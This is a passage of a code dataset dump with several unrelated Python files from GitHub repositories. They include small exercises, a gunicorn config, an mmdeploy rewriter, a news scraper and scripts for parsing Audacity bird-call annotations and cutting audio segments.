e.split(',')\n scores = [float(sc) for sc in stu[1:]]\n data.append([stu[0] + scores])\n\n\nfor stu in data:\n name = stu[0]\n scores = stu[1:]\n plot.clf()\n plot.plot(scores, marker = 'o', label = 'Score')\n plot.title(name)\n plot.xticks(range(len(scores)), captions[1:])\n plot.xlabel('Items')\n plot.ylabel('Scores')\n plot.ylim(0,100)\n plot.tight_layout()\n plot.savefig(name + '.png')\n #plot.show()","repo_name":"JayChiang17/Data-Analysis","sub_path":"成績曲線.py","file_name":"成績曲線.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17428605424","text":"import flet as ft\nimport flet_route\nimport gui\nfrom gui import (\n home,\n register,\n street,\n barrier_control\n)\n\n\ndef main(page: ft.Page):\n page.title = gui.NAME\n\n page.window_width = gui.WIDTH\n page.window_height = gui.HEIGHT\n page.window_resizable = False\n\n app_routes = [\n flet_route.path(\n url = '/reg',\n clear = True,\n view = register.IndexView\n ),\n flet_route.path(\n url = '/',\n clear = True,\n view = home.IndexView\n ),\n flet_route.path(\n url = '/street',\n clear = True,\n view = street.IndexView\n ),\n flet_route.path(\n url = '/barrier_control',\n clear = True,\n view = barrier_control.IndexView\n )\n ]\n\n flet_route.Routing(\n page = page,\n app_routes = app_routes\n )\n\n page.go('/reg')\n\n\nft.app(\n target = main,\n name = gui.NAME,\n view = ft.AppView.FLET_APP,\n assets_dir = gui.ASSETS_DIR,\n)\n","repo_name":"kottoamatsukami/Smart_Barrier","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8217870626","text":"# 내장함수 sorted 사용\nimport sys\nlst=[]\nfor _ in range(int(input())):\n lst.append(int(sys.stdin.readline()))\nprint(*sorted(lst), end='\\n')\n\n# 버블정렬 - 시간복잡도 O(n^2)\nlst=[]\nfor _ in range(int(input())):\n lst.append(int(input()))\n\ndef bubblesort(lst):\n while 1:\n changed=0\n for i in range(len(lst)-1):\n if lst[i]>lst[i+1]:\n lst[i],lst[i+1]=lst[i+1],lst[i]\n changed=1\n if not changed:\n return lst\nprint(*bubblesort(lst),end='\\n')\n","repo_name":"nang-e/Baekjoon","sub_path":"12. 정렬/baekjoon_2750.py","file_name":"baekjoon_2750.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14129046090","text":"\"\"\"\nRecursion: When a function calls itself.\n\"\"\"\n\n# Factorial of a number using iterative method\n\n\ndef fact_iterative(n):\n fact = 1\n for i in range(1, n+1, 1):\n fact = fact*i\n # i = i+1\n print(fact)\n\n\nnum = int(input(\"Enter a number for iterative factorial: \"))\nfact_iterative(num)\n\n\ndef fact_recursive(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return n*fact_recursive(n-1)\n\n\nnum = int(input(\"Enter a number for Recursion factorial: \"))\nprint(fact_recursive(num))\n","repo_name":"puja809/Python","sub_path":"Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23073414455","text":"import json\nimport multiprocessing\nimport os\n\nconfig_file = os.getenv(\"GUNICORN_CONF\", \"DEFAULT\")\nworkers_per_core_str = os.getenv(\"WORKERS_PER_CORE\", \"1\")\nweb_concurrency_str = os.getenv(\"WEB_CONCURRENCY\", \"1\")\nhost = os.getenv(\"HOST\", \"0.0.0.0\")\nport = os.getenv(\"PORT\", \"8080\")\nbind_env = os.getenv(\"BIND\", None)\nuse_loglevel = os.getenv(\"LOG_LEVEL\", \"info\")\ntimeout = os.getenv(\"TIMEOUT\", 30)\nworker_class = os.getenv(\"WORKER_CLASS\", \"uvicorn.workers.UvicornWorker\")\nkeepalive = os.getenv(\"KEEPALIVE\", 2)\nmax_requests = os.getenv(\"MAX_REQUESTS\", 1000)\n\nif bind_env:\n use_bind = bind_env\nelse:\n use_bind = f\"{host}:{port}\"\n\ncores = multiprocessing.cpu_count()\nworkers_per_core = float(workers_per_core_str)\ndefault_web_concurrency = workers_per_core * cores\nif web_concurrency_str:\n web_concurrency = int(web_concurrency_str)\n assert web_concurrency > 0\nelse:\n web_concurrency = max(int(default_web_concurrency), 1)\n\n# Gunicorn config variables\nloglevel = use_loglevel\nworkers = web_concurrency\nbind = use_bind\nkeepalive = 120\nerrorlog = \"-\"\n\n# For debugging and testing\nlog_data = {\n \"config_file\": config_file,\n \"loglevel\": loglevel,\n \"workers\": workers,\n \"bind\": bind,\n # Additional, non-gunicorn variables\n \"workers_per_core\": workers_per_core,\n \"host\": host,\n \"port\": port,\n \"timeout\": timeout,\n \"worker_class\": worker_class,\n \"keepalive\": keepalive\n}\nprint(json.dumps(log_data))","repo_name":"Salfiii/fastapi-template","sub_path":"app/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13920385481","text":"import torch\n\nfrom mmdeploy.core import FUNCTION_REWRITER\nfrom mmdeploy.utils import is_dynamic_shape\n\n\n@FUNCTION_REWRITER.register_rewriter('mmdet.models.detectors.maskformer.'\n 'MaskFormer.forward')\ndef maskformer__forward(self,\n batch_inputs,\n data_samples,\n mode='tensor',\n **kwargs):\n \"\"\"Rewrite `forward` for default backend. Support configured dynamic/static\n shape for model input and return detection result as Tensor instead of\n numpy array.\n\n Args:\n batch_inputs (Tensor): Inputs with shape (N, C, H, W).\n batch_data_samples (List[:obj:`DetDataSample`]): The Data\n Samples. It usually includes information such as\n `gt_instance`, `gt_panoptic_seg` and `gt_sem_seg`.\n rescale (bool): Whether to rescale the results.\n Defaults to True.\n\n Returns:\n tuple[Tensor, Tensor, Tensor, Tensor]:\n (bboxes, labels, masks, semseg), `bboxes` of shape [N, num_det, 5],\n `labels` of shape [N, num_det], `masks` of shape [N, roi_H, roi_W],\n `semseg` of shape [N, num_sem_class, sem_H, sem_W].\n \"\"\"\n ctx = FUNCTION_REWRITER.get_context()\n deploy_cfg = ctx.cfg\n\n # get origin input shape as tensor to support onnx dynamic shape\n is_dynamic_flag = is_dynamic_shape(deploy_cfg)\n img_shape = torch._shape_as_tensor(batch_inputs)[2:]\n if not is_dynamic_flag:\n img_shape = [int(val) for val in img_shape]\n # set the metainfo\n # note that we can not use `set_metainfo`, deepcopy would crash the\n # onnx trace.\n for data_sample in data_samples:\n data_sample.set_field(\n name='img_shape', value=img_shape, field_type='metainfo')\n data_sample.set_field(\n name='batch_input_shape', value=img_shape, field_type='metainfo')\n\n feats = self.extract_feat(batch_inputs)\n mask_cls_results, mask_pred_results = self.panoptic_head.predict(\n feats, data_samples)\n # do not export panoptic_fusion_head\n return mask_cls_results, mask_pred_results\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmdet/models/detectors/maskformer.py","file_name":"maskformer.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"36331563712","text":"from newspaper import newspaper # from newspaper import Article, Config # https://newspaper.readthedocs.io/en/latest/ \nfrom datetime import datetime\nfrom urllib.parse import urljoin, urlparse, parse_qs\nimport re\nfrom tqdm import tqdm\nimport logging\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.WARNING)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n# 콘솔로 출력\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\n\"\"\"\n\nkeep_article_html, default False, “set to True if you want to preserve html of body text”\nhttp_success_only, default True, “set to False to capture non 2XX responses as well”\nMIN_WORD_COUNT, default 300, “num of word tokens in article text”\nMIN_SENT_COUNT, default 7, “num of sentence tokens”\nMAX_TITLE, default 200, “num of chars in article title”\nMAX_TEXT, default 100000, “num of chars in article text”\nMAX_KEYWORDS, default 35, “num of keywords in article”\nMAX_AUTHORS, default 10, “num of author names in article”\nMAX_SUMMARY, default 5000, “num of chars of the summary”\nMAX_SUMMARY_SENT, default 5, “num of sentences in summary”\nMAX_FILE_MEMO, default 20000, “python setup.py sdist bdist_wininst upload”\nmemoize_articles, default True, “cache and save articles run after run”\nfetch_images, default True, “set this to false if you don’t care about getting images”\nfollow_meta_refresh, default False, “follows a redirect url in a meta refresh html tag”\nimage_dimension_ration, default 16/9.0, “max ratio for height/width, we ignore if greater”\nlanguage, default ‘en’, “run newspaper.languages() to see available options.”\nbrowser_user_agent, default ‘newspaper/%s’ % __version__\nrequest_timeout, default 7\nnumber_threads, default 10, “number of threads when mthreading”\nverbose, default False, “turn this on when debugging”\n\"\"\"\n\n\n\ndef scrap(urls, idx=None, sensitive_domain_cats=None): \n docs_info = []\n docs_idx = []\n no_scraped_urls_by_types = {'sensitive_domain':[], 'parse_error':[], 'empty_contents':[]}\n\n \n if idx is not None:\n assert len(idx) == len(urls), \"The length of urls and idx should be same.\"\n doc_info = {}\n #urls = set(urls) # 이거 실행하면 순서가 바뀌어버림..\n\n sensitive_domains = get_sensitive_domains(sensitive_domain_cats)\n\n # Newspaper3k configuration \n config = newspaper.Config()\n config.browser_user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n # config.MIN_WORD_COUNT = 100\n # config.memoize_articles = False\n # config.fetch_images = False\n # number_threads = 16 # 10\n # verbose = True\n\n for i, url in tqdm(enumerate(urls), desc='scraper'):\n url = url_prefix_adder(url)\n\n # check whether sensitive_domain is or not\n if is_sensitive_domain(url, sensitive_domains):\n no_scraped_urls_by_types['sensitive_domain'].append(url)\n logger.info(f\"sensitive_domain: {url}\")\n continue\n\n # Scraping\n article = newspaper.Article(url, config=config) # , language='ko'\n\n try:\n logger.info(\"loading %s\", url)\n article.download() # request\n article.parse() # parsing\n \n doc_info = {\n 'title': article.title,\n # 'authors': article.authors,\n 'publish_date': article.publish_date,\n 'contents': article.text,\n 'url': url,\n 'crawl_at': datetime.now(),\n 'is_news': article.is_valid_url(),\n # 'top_image': article.top_image,\n # 'movies': article.movies\n }\n\n except:\n logger.warning(f\"parse_error: {url}\")\n no_scraped_urls_by_types['parse_error'].append(url)\n continue\n \n if doc_info['title'] == '' or doc_info['contents'] == '':\n logger.warning(f\"title/contents is empty: {url}\")\n no_scraped_urls_by_types['empty_contents'].append(url)\n continue\n else:\n #print(doc_info['title'], type(doc_info['title']))\n docs_info.append(doc_info) \n if idx is not None:\n docs_idx.append(idx[i])\n\n logger.info(f\"Complete scrape {len(docs_info)} among {len(urls)}\")\n \n return docs_info, docs_idx, no_scraped_urls_by_types\n\n\ndef url_extractor(text):\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n url = re.findall(regex,text) \n return [x[0] for x in url] \n\ndef url_prefix_adder(url):\n \"\"\"\n url 앞에 http:// 또는 https://가 붙어 있지 않은 url의 경우, 앞에 이를 붙여서 리턴\n \"\"\"\n http_reg = re.compile(\"https?://\\S*\")\n \n if http_reg.match(url):\n return url\n else:\n url_fixed = \"https://\" + url #http로..?\n # requests.get() # 잘되는지 체크가 필요하지만... \n return url_fixed\n\n\n\n\ndef get_sensitive_domains(sensitive_domain_cats=None):\n\n sensitive_domains_dict = {\n \"cloud\": ['dropbox.com','drive.google.com', 'onedrive.live.com'],\n \"sns/community\": ['facebook.com','instagram.com', 'twitter.com', 'dcinside.com','fmkorea.com','humoruniv.com',],\n 'shopping': ['gmarket.co.kr','auction.co.kr','11st.co.kr','coupang.com','tmon.co.kr','interpark.com','ssg.com','wemakeprice.com','danawa.com','yes24.com','amazon.com','ebay.com','amazon.co.jp','amazon.co.uk','ppomppu.co.kr',],\n \"ott\": ['youtube.com','netflix.com','melon.com','afreecatv.com','pandora.tv','wavve.com','twitch.tv','gomtv.com','toptoon.com',],\n \"online_meeting\": ['zoom.us','meet.google.com',],\n }\n \n if sensitive_domains_dict is None:\n return None\n else:\n sensitive_domains = [domain for cat in sensitive_domain_cats for domain in sensitive_domains_dict[cat]]\n return sensitive_domains\n\ndef is_sensitive_domain(url, sensitive_domains):\n for domain in sensitive_domains:\n if domain in url:\n return True\n return False\n \n#print(check_sensitive_webpage('gmarket.co.kr', ['Shopping']))","repo_name":"uoneway/Prepo","sub_path":"prepo/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73598924327","text":"from mne.utils import _TempDir\n\n# our imports\nfrom nice.markers import PowerSpectralDensity\nfrom nice.markers import ContingentNegativeVariation\nfrom nice.markers import PermutationEntropy\nfrom nice.markers import PowerSpectralDensityEstimator\n\nfrom nice_sandbox.markers.connectivity import WeightedPhaseLagIndex\n\nfrom nice import Markers, read_markers\n\nfrom nice.tests.test_collection import _get_data\n\n\ndef test_collecting_feature():\n \"\"\"Test computation of spectral markers\"\"\"\n epochs = _get_data()[:2]\n psds_params = dict(n_fft=4096, n_overlap=100, n_jobs='auto',\n nperseg=128)\n estimator = PowerSpectralDensityEstimator(\n tmin=None, tmax=None, fmin=1., fmax=45., psd_method='welch',\n psd_params=psds_params, comment='default'\n )\n\n wpli = WeightedPhaseLagIndex()\n markers_list = [\n PowerSpectralDensity(estimator=estimator, fmin=1, fmax=4),\n ContingentNegativeVariation(),\n wpli\n ]\n\n markers = Markers(markers_list)\n # check states and names\n for name, marker in markers.items():\n assert not any(k.endswith('_') for k in vars(marker))\n assert name == marker._get_title()\n\n # check order\n assert list(markers.values()) == markers_list\n\n # check fit\n markers.fit(epochs)\n for t_marker in markers_list:\n assert any(k.endswith('_') for k in vars(t_marker))\n\n tmp = _TempDir()\n tmp_fname = tmp + '/test-smarkers.hdf5'\n markers.save(tmp_fname)\n markers2 = read_markers(tmp_fname)\n for ((k1, v1), (k2, v2)) in zip(markers.items(), markers2.items()):\n assert k1 == k2\n assert (\n {k: v for k, v in vars(v1).items() if not k.endswith('_') and\n not k == 'estimator'} ==\n {k: v for k, v in vars(v2).items() if not k.endswith('_') and\n not k == 'estimator'})\n pe = PermutationEntropy().fit(epochs)\n markers._add_marker(pe)\n\n tmp = _TempDir()\n tmp_fname = tmp + '/test-markers.hdf5'\n markers.save(tmp_fname)\n markers3 = read_markers(tmp_fname)\n assert pe._get_title() in markers3\n\n assert wpli._get_title() in markers3\n","repo_name":"fraimondo/nice-sandbox","sub_path":"nice_sandbox/markers/tests/test_collection.py","file_name":"test_collection.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34574587525","text":"# Given the head of a linked list, remove the nth node from the end of the list and return its head.\n\n \n\n# Example 1:\n\n\n# Input: head = [1,2,3,4,5], n = 2\n# Output: [1,2,3,5]\n# Example 2:\n\n# Input: head = [1], n = 1\n# Output: []\n# Example 3:\n\n# Input: head = [1,2], n = 1\n# Output: [1]\n \n\nfrom itertools import count\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next \n \ndef countList(list):\n count = 1\n while list.next:\n count+=1\n list = list.next\n return count\n\n\ndef removeNthFromEnd(head, n):\n if n == 0:\n return head \n else:\n to_return = head\n len = countList(head)\n if len == n:\n return head.next\n pos = len - n\n pointer = 1\n\n while pointer 1 and df.iat[1,0] == '\\\\':\n has_freq_range = True\n print('freq range info included in label file')\n else:\n has_freq_range = False\n\n if has_freq_range:\n \n if ignore_freq_range:\n # Remove freq range rows starting with \\ (all odd rows) if ignore_freq_range\n df = df.drop(df[df.iloc[:, 0] == '\\\\'].index).reset_index(drop=True)\n # Add header\n df.columns = ['start_time', 'end_time', 'label']\n else:\n # Include freq range as new cols start_freq and end_freq\n\n # Get start & end freq\n df_freq = df[df.iloc[:, 0] == '\\\\']\n start_freq_list = df_freq.iloc[:, 1].tolist()\n end_freq_list = df_freq.iloc[:, 2].tolist()\n #print(df_freq)\n\n # Remove freq range rows starting with \\ (all odd rows)\n df = df.drop(df[df.iloc[:, 0] == '\\\\'].index).reset_index(drop=True)\n # Add header\n df.columns = ['start_time', 'end_time', 'label']\n\n # Add cols\n df['start_freq'] = start_freq_list\n df['end_freq'] = end_freq_list\n\n # Reorder cols\n df = df[['start_time', 'end_time', 'start_freq', 'end_freq', 'label']]\n #print(df)\n\n else:\n # Add header\n df.columns = ['start_time', 'end_time', 'label']\n\n #print(df)\n return df\n\ndef process_audacity_label_data(df, check_label_data=True):\n\n '''\n example of label: sp=Crex crex; ct=s; ql=2; id=1; bg=0; cm=Hallo\n\n Artname (sp): Crex crex\n Lauttyp (ct): vorerst 3: s=Gesang, c=Ruf, i=instrumental (Trommeln o.ä.)\n Qualität (ql): 1 bis 5; 1 – sehr gut; 2 – gut; 3 – brauchbar; 4 – sehr schlecht; 5 – gerade noch zu hören\n Sicherheit d. Identifikation (id): 1 – zu 100% sicher, 2 – sehr sicher, 3 – unsicher\n Hintergrund (bg): 0 – kein Hintergrund; 1 – im Hintergrund andere Art, aber deutlich leiser; 2 - im Hintergrund andere Art deutlich\n Freies Feld (cm): alle anderen Kommentare\n '''\n\n assignment_operator = '='\n separator = ';'\n\n key_tags = ['sp', 'ct', 'ql', 'id', 'bg', 'cm']\n key_names = ['species', 'call_type', 'quality', 'id_level', 'background_level', 'comment']\n\n # ToDo: Sanity checks\n # assignment_operator, separator correct\n # what key_tags are used\n # are number of key_tags always the same\n\n n_rows = len(df.index)\n\n label_df_dict = {}\n for key in key_tags:\n label_df_dict[key] = [None] * n_rows\n\n for ix, row in df.iterrows():\n label_str = row['label']\n # Remove leading and trailing whitespaces\n label_str = label_str.strip()\n # Remove leading and trailing separators\n label_str = label_str.strip(separator)\n\n #print(ix, label_str)\n\n # Split into labels\n labels = label_str.split(separator)\n #print(labels)\n\n \n for label in labels:\n # Remove leading and trailing whitespaces\n label = label.strip()\n #print(label)\n key_value_pair = label.split(assignment_operator)\n #print(key_value_pair)\n key = key_value_pair[0]\n value = key_value_pair[1]\n #print(key, value)\n \n if key not in key_tags:\n print('Error: Undefined key', key, ix, label)\n else:\n # Dequote comment string: \"comment\" --> comment\n if key == 'cm' and value[0] == value[-1] and value.startswith((\"'\", '\"')):\n value = value[1:-1]\n\n label_df_dict[key][ix] = value\n\n #print(label_df_dict)\n\n # Check if there are label without any/some data\n if check_label_data:\n for key in key_tags:\n if label_df_dict[key].count(None) == len(label_df_dict[key]):\n print(key, 'has no data at all')\n else:\n if label_df_dict[key].count(None) > 0:\n print(key, 'has no data sometimes')\n\n label_df = pd.DataFrame.from_dict(label_df_dict)\n # Rename cols (e.g. sp --> species)\n label_df.columns = key_names\n #print(label_df)\n\n # Remove label col from original df\n df = df.drop(columns=['label'])\n\n # Merge original df with extracted label df\n assert len(df.index) == len(label_df.index)\n df_concatenated = pd.concat([df, label_df], axis=\"columns\")\n #print(df_concatenated)\n\n return df_concatenated\n\n\n#path = lars_dir + 'Unteres_Odertal_2021_06_10/Devise02_2021-06-10T22-38-32_Pos01.txt'\n#path = metadata_dir + '_BackupML/Devise07_2022-05-09T20-40-27_Annotation.txt'\npath = lars_dir + 'Criewen_2022_05_15/Criewen02/CRIEWEN02_20220515_202400.txt'\n# df = read_audacity_label_file(path)\n# df = process_audacity_label_data(df)\n# print(df)\n\ndef read_raven_label_file(path):\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n # Read audacity label track txt file\n df = pd.read_csv(path, sep='\\t')\n #print(df)\n return df\n\npath = root_dir + 'Scolopax_rusticola_Recordings/Monitoring/Peenemuende_140525_327_4ch.Table.1.selections.txt'\n#read_raven_label_file(path)\n\ndef write_part_of_audio_file(path, start_time=0.0, end_time=None, channel_ix=None, dst_dir=None, format=None, add_start_time_even_if_zero=False):\n\n # ToDo Maybe: resample, remove dc-offset (hp filter), normalize, fade in/out\n\n # Get filename and extension\n filename = os.path.basename(path)\n [filename_without_ext, ext] = os.path.splitext(filename)\n \n # Get destination directory\n if not dst_dir:\n # Use same dir as src file path\n dst_dir = os.path.dirname(path) + '/'\n if dst_dir[-1] != '/':\n dst_dir += '/'\n if not os.path.exists(dst_dir): \n os.makedirs(dst_dir)\n\n # Get dst path\n filename_new = filename_without_ext + create_postfix_str(start_time, add_start_time_even_if_zero=add_start_time_even_if_zero)\n if channel_ix is not None: \n filename_new += '_c' + str(channel_ix)\n if format: \n ext = '.' + format\n path_new = dst_dir + filename_new + ext\n\n if not os.path.isfile(path_new):\n\n if os.path.isfile(path):\n \n # Get audio file infos\n with sf.SoundFile(path) as f:\n samplerate = f.samplerate\n n_channels = f.channels\n subtype = f.subtype # bit depth info, e.g. 'PCM_16', 'PCM_24'\n\n start_ix = 0\n end_ix = None\n if start_time:\n start_ix = int(start_time*samplerate)\n if end_time:\n end_ix = int(end_time*samplerate)\n data, samplerate = sf.read(path, start=start_ix, stop=end_ix, always_2d=True)\n\n if channel_ix is not None:\n sf.write(path_new, data[:,channel_ix], samplerate, subtype=subtype)\n else:\n sf.write(path_new, data, samplerate, subtype=subtype)\n \n else:\n print('Error file not found', path)\n\n else:\n print('Warning dst path already existing', path_new)\n\n\ndef get_open_intervals(df, global_start_time=0.0, global_end_time=None):\n \n # Input: df with intervals (start_time, end_time)\n # Output: df with open intervals not intersecting with input intervals\n \n df_new_dict = {}\n df_new_dict['start_time'] = []\n df_new_dict['end_time'] = []\n\n # Get list of dicts (pairs of time, start/stop event type)\n events = []\n for ix, row in df.iterrows():\n event = {'time': row['start_time'], 'type': 'start_time'}\n events.append(event)\n event = {'time': row['end_time'], 'type': 'end_time'}\n events.append(event)\n\n # Sort by time\n events = sorted(events, key=lambda d: d['time']) \n #print(events)\n\n start_time = 0.0\n counter = 0\n for event in events:\n\n if counter == 0 and event['time'] > global_start_time:\n df_new_dict['start_time'].append(start_time)\n df_new_dict['end_time'].append(event['time'])\n\n if event['type'] == 'start_time': counter +=1\n else: counter -=1\n\n start_time = event['time']\n \n # Get last interval if last end_time < global_end_time\n if global_end_time and global_end_time > start_time:\n df_new_dict['start_time'].append(start_time)\n df_new_dict['end_time'].append(global_end_time)\n\n # Convert to df\n df_new = pd.DataFrame.from_dict(df_new_dict)\n #print(df_new) \n\n return df_new\n\ndef create_noise_annotations(df, dilation_duration=1.0, min_duration=5.0):\n \n # Create dataframe with anti/none annotations (all intervals without annotation for each filename)\n\n # Cols belonging to annoations that get meaningless\n cols_set_to_none = ['start_frequency', 'end_frequency', 'individual_id', 'group_id', 'vocalization_type', 'quality_tag', 'id_level', 'background_level', 'remarks', 'xeno_canto_background', 'species_latin_name']\n\n # Create df_dilation (add time interval to start/end time)\n df_dilation = df.copy()\n df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n\n # Check/correkt if start_time < 0.0 (ToDo: end_time > duration)\n df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n\n # Sort by filename and start_time\n df_dilation = df_dilation.sort_values(['filename', 'start_time']).reset_index(drop=True)\n #print(df_dilation[10:20])\n\n # Create new df with same cols\n cols = df_dilation.columns\n #print(list(cols))\n df_new = pd.DataFrame(columns=cols)\n\n filenames = list(df['filename'].unique())\n n_files = len(filenames)\n\n counter = 0\n for filename in filenames:\n\n #if counter > 4: break\n\n df_filename = df_dilation[df_dilation['filename']==filename].reset_index(drop=True)\n #print(df_filename)\n\n # Get duration\n path = df_filename.record_filepath.values[0]\n with sf.SoundFile(path) as f:\n duration = f.frames/f.samplerate\n\n\n df_filename_noise = get_open_intervals(df_filename, global_start_time=0.0, global_end_time=duration)\n\n # Filter intervals >= min_duration\n df_filename_noise = df_filename_noise[(df_filename_noise['end_time'] - df_filename_noise['start_time'] >= min_duration)].reset_index(drop=True)\n #print(df_filename_noise)\n\n # Add org recording metadata\n for ix, row in df_filename_noise.iterrows():\n # Append first row of df_filename\n df_new = df_new.append(df_filename.iloc[0]).reset_index(drop=True)\n # Change start/end_time\n df_new.at[df_new.index[-1], 'start_time'] = row['start_time']\n df_new.at[df_new.index[-1], 'end_time'] = row['end_time']\n\n counter += 1\n\n # Set cols with annoation individual values to None\n for col in cols_set_to_none:\n if col in cols:\n df_new[col] = None\n\n #print(df_new)\n\n return df_new\n\ndef divide_intervals_into_beginning_and_end(df, segment_duration=10.0, segment_duration_max=30.0, segment_duration_min=None):\n\n # Divide/Reduce intervals in beginning and end part with duration=segment_duration \n # Divide/Reduce interval only if original duration >= segment_duration_max\n # Discard middle part\n # Remove intervals with duration < segment_duration_min\n\n assert segment_duration_max > 2*segment_duration\n\n rows_to_remove_ixs = []\n\n for ix, row in df.iterrows():\n start_time = row['start_time']\n end_time = row['end_time']\n duration = end_time - start_time\n assert duration > 0.0\n \n if duration >= segment_duration_max:\n # Adjust original interval\n df.at[ix, 'end_time'] = start_time + segment_duration\n # Append end segment to df\n row_new = row\n row_new['start_time'] = end_time - segment_duration\n df = df.append(row_new, ignore_index=True)\n #print(ix, start_time, end_time)\n\n if segment_duration_min and duration < segment_duration_min:\n rows_to_remove_ixs.append(ix)\n #print(ix, start_time, end_time)\n \n # Remove intervals with duration < segment_duration_min\n if len(rows_to_remove_ixs):\n df = df.drop(df.index[rows_to_remove_ixs]).reset_index(drop=True)\n \n # Sort\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n return df\n\ndef process_Crex_crex_Unteres_Odertal_2017():\n\n\n write_audio_files = False # True False\n write_metadata = True\n\n audio_root_src_dir = root_dir + 'Crex_crex_annotated/Crex_crex_Unteres_Odertal_2017_annotated/'\n audio_root_dst_dir = root_dir + 'Annotationen/_Segments/'\n\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Crex_crex_Unteres_Odertal_2017_v02'\n\n collection_name = 'devise'\n \n # Read excel file\n path = metadata_dir + 'Crex_crex_Unteres_Odertal_2017.xlsx'\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n df = pd.read_excel(path, engine='openpyxl')\n #print(df)\n print('n_rows', len(df))\n\n filenames = df['filename'].unique()\n n_filenames = len(filenames)\n #print(filenames)\n print('n_filenames', n_filenames)\n\n # df_new stuff\n df_new_dict = {}\n keys = ['filename', 'species_latin_name', 'noise_name', 'record_date', 'record_filepath']\n for key in keys:\n df_new_dict[key] = []\n\n\n for ix, row in df.iterrows():\n\n #if ix > 10: break\n #print(ix, row['filename'])\n\n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n channel_ix = row['channel_ix']\n\n if row['class'] == 'Crex crex':\n dst_sub_dir = 'Crex_crex'\n df_new_dict['species_latin_name'].append(row['class'])\n df_new_dict['noise_name'].append(None)\n if row['class'] == 'BG':\n dst_sub_dir = 'Crex_crex_BG'\n df_new_dict['species_latin_name'].append(None)\n df_new_dict['noise_name'].append('Crex crex absent')\n\n path = audio_root_src_dir + row['sub_dir'] + '/' + filename + '.wav'\n\n if not os.path.isfile(path):\n print(\"Error: File not found\", path)\n continue\n \n \n dst_dir = audio_root_dst_dir + dst_sub_dir + '/'\n\n if write_audio_files: \n write_part_of_audio_file(path, start_time, end_time, channel_ix=channel_ix, dst_dir=dst_dir)\n\n\n filename_new = filename + create_postfix_str(start_time) + '_c' + str(channel_ix)\n\n df_new_dict['filename'].append(filename_new)\n \n date_str = filename.split('_')[3]\n date = date_str[:4] + '-' + date_str[4:6] + '-' + date_str[6:8]\n df_new_dict['record_date'].append(date)\n\n filenamepath_new = dst_dir + filename_new + '.wav'\n df_new_dict['record_filepath'].append(filenamepath_new)\n\n\n print(filename, filename_new)\n\n\n df_new = pd.DataFrame.from_dict(df_new_dict)\n\n # Add infos\n df_new['id_level'] = 1\n df_new['vocalization_type'] = 'song'\n \n df_new['recordist_name'] = 'Frommolt, Karl-Heinz'\n df_new['annotator_name'] = 'Frommolt, Karl-Heinz'\n df_new['location_name'] = 'Unteres Odertal'\n df_new['collection_name'] = collection_name\n\n print(df_new)\n\n # Write metadata (excel, csv)\n if write_metadata:\n df_new.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df_new.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n#process_Crex_crex_Unteres_Odertal_2017()\n\ndef process_hakan_schoenow():\n\n write_audio_parts = False # True False\n write_metadata = True\n \n src_dir = root_dir + 'Scolopax_rusticola_Recordings/Monitoring/'\n dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola/'\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_MfN_Peenemuende+Schoenow_v04'\n\n # Collect annotations from excel files\n xlsx_files = [\n 'Scolopax_rusticola_MfN_Schoenow_2007.xlsx',\n 'Scolopax_rusticola_MfN_Schoenow_2008.xlsx',\n 'Scolopax_rusticola_MfN_Schoenow_2009.xlsx',\n 'Scolopax_rusticola_MfN_Peenemuende_2014.xlsx']\n\n df_list = []\n for file in xlsx_files:\n path = metadata_dir + file\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n df = pd.read_excel(path, engine='openpyxl')\n print(df)\n 